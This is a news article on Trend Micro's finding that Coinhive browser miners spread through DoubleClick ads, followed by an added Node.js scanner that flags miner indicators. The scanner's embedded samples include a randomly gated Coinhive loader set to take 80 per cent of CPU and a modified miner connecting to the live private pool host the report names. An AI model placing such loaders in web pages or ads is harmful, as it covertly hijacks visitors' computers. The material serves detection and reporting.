Warning over Coinhive cryptocurrency mining malware exploiting Google's DoubleClick online ad network

Coinhive cryptocurrency mining malware tripled in January, warns Trend Micro

The number of Coinhive web miner detections has tripled as a result of aggressive "malvertising campaigns" being run over online advertising networks, according to security firm Trend Micro.

Researchers at the company recently found that cyber crooks are deploying advertisements on high-traffic websites; the adverts use Coinhive, as well as a separate web mining script that connects to a private pool.

Attackers are also tapping into Google's DoubleClick advertising network, which dominates online advertising. Countries particularly affected include Japan, France, Taiwan, Italy, and Spain, Trend Micro claimed.


The firm said that it has disclosed its findings to Google. "We detected an almost 285 per cent increase in the number of Coinhive miners on 24 January. We started seeing an increase in traffic to five malicious domains on 18 January," it said.

"After closely examining the network traffic, we discovered that the traffic came from DoubleClick advertisements."

After analysing the 'malvertisement'-riddled pages, the security specialists identified two different web miner scripts, plus a third script that displays advertisements served through DoubleClick.

The webpages deceive users by showing legitimate advertisements while "the two web miners covertly perform their tasks", so users are unaware that anything is happening.

Trend Micro explained: "We speculate that the attackers' use of these advertisements on legitimate websites is a ploy to target a larger number of users, in comparison to only that of compromised devices."

The adverts carry JavaScript "that generates a random number between variables 1 and 101" to decide whether to invoke the miner, which is set to use 80 per cent of the computer's CPU, said the firm.

"After de-obfuscating the private web miner called mqoj_1.js, there will be a JavaScript code that is still based on Coinhive," explained the firm.

"The modified web miner will use a different mining pool at wss[:]//ws[.]l33tsite[.]info[:]8443. This is done to avoid Coinhive's 30% commission fee."
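The indicators described above (a random draw that gates whether the miner is loaded, a throttle setting that leaves the miner 80 per cent of the CPU, and a modified miner pointed at a private WebSocket pool instead of Coinhive's) can be checked for statically. The following is an added example written for this article, not Trend Micro's tooling or the campaign's code: a Node.js scanner run over constructed sample scripts. The sample scripts, the site-key placeholder, the gating threshold and the indicator patterns are assumptions; only the pool hostname is the one the report cites. It also assumes Coinhive's own pools live under coinhive.com and treats any other WebSocket pool as a private one.

```javascript
// Added example (not Trend Micro's or the campaign's code): static scan of
// script text for the miner indicators the report describes.
// Run with: node scan_miners.js

// Constructed sample scripts. Only ws.l33tsite.info:8443 comes from the
// report; the loader logic, threshold and site key are illustrative.
const SAMPLE_SCRIPTS = {
  // Ad loader: a random draw decides whether the miner is fetched at all,
  // so a single page load may look clean. Threshold is an assumption.
  "ad_loader.js": `
    var n = Math.floor(Math.random() * 101) + 1;
    if (n > 10) {
      var s = document.createElement('script');
      s.src = 'https://coinhive.com/lib/coinhive.min.js';
      s.onload = function () {
        var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.2 });
        miner.start();
      };
      document.head.appendChild(s);
    }
  `,
  // Modified miner that talks to a private pool rather than Coinhive's.
  "mqoj_1.js": `
    var job = null;
    var ws = new WebSocket('wss://ws.l33tsite.info:8443');
    ws.onmessage = function (e) { job = JSON.parse(e.data); };
    var worker = new Worker('cryptonight.js');
  `,
  // Ordinary ad tag with no miner indicators (constructed URL).
  "ad_tag.js": `
    var img = new Image();
    img.src = 'https://ad.example/track?id=1';
  `,
};

// Indicator patterns (assumptions for this example). CoinHive.Anonymous and
// the throttle option are the public Coinhive library API.
const INDICATORS = [
  { name: "coinhive-loader",    re: /coinhive\.min\.js/i },
  { name: "coinhive-api",       re: /CoinHive\.(Anonymous|User)\s*\(/ },
  { name: "cryptonight-worker", re: /cryptonight/i },
  { name: "random-gate",        re: /Math\.random\(\)\s*\*\s*10[01]/ },
];
const WS_POOL_RE = /wss?:\/\/[^\s'"`]+/g;
const THROTTLE_RE = /throttle\s*:\s*(0?\.\d+|[01])/;

function parseUrls(candidates) {
  // Drop anything the URL parser rejects rather than crashing the scan.
  return candidates.flatMap((u) => { try { return [new URL(u)]; } catch { return []; } });
}

function scanScript(name, text) {
  const indicators = INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
  const pools = parseUrls(text.match(WS_POOL_RE) || []);
  // Assumption: Coinhive's own pool hosts are under coinhive.com; any other
  // WebSocket endpoint is treated as a private pool (the commission-evading
  // variant the report describes).
  const privatePools = pools
    .filter((u) => !u.hostname.endsWith("coinhive.com"))
    .map((u) => u.host);
  // Coinhive's throttle is the fraction of time the miner idles, so the CPU
  // share it takes is 1 - throttle (throttle: 0.2 -> 80 per cent).
  const m = THROTTLE_RE.exec(text);
  const cpuShare = m ? Math.round((1 - parseFloat(m[1])) * 100) : null;
  return {
    name,
    indicators,
    privatePools,
    cpuShare,
    suspicious: indicators.length > 0 || privatePools.length > 0,
  };
}

function scanAll(scripts) {
  return Object.entries(scripts).map(([name, text]) => scanScript(name, text));
}

for (const r of scanAll(SAMPLE_SCRIPTS)) {
  console.log(JSON.stringify(r));
}
```

In practice the input would be the scripts actually fetched during a page load (from a headless browser or a proxy capture) rather than embedded samples, and because the loader only invokes the miner on a fraction of page views, a single clean capture proves little; a sustained WebSocket from an ad frame to a host that is neither the publisher nor the ad network is the more reliable signal.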

On mitigation, Trend Micro said: "Blocking JavaScript-based applications from running on browsers can prevent Coinhive miners from using CPU resources."

"Regularly patching and updating software - especially web browsers - can mitigate the impact of cryptocurrency malware and other threats that exploit system vulnerabilities."